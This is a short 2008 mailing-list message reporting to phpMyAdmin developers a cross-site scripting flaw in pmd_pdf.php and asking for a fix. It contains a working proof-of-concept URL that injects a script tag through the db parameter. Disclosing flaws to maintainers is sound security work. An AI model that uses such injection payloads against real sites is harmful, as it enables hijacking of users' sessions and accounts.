[Phpmyadmin-devel] XSS in current phpmyadmin versions

Fabian Fingerle fabian at datensalat.eu
Wed Oct 29 15:59:17 CET 2008


Hi,

Exploit :

register_globals=on,off
loged in ....

query :
http://localhost/pmd_pdf.php?db=>"><script>alert(1)</script>

Could you fix this quickly?

Yours
 Fabian
-------------- next part --------------
A non-text attachment was scrubbed...
Name: signature.asc
Type: application/pgp-signature
Size: 197 bytes
Desc: not available
URL: <http://lists.phpmyadmin.net/pipermail/developers/attachments/20081029/3c9c2bd4/attachment.sig>


More information about the Developers mailing list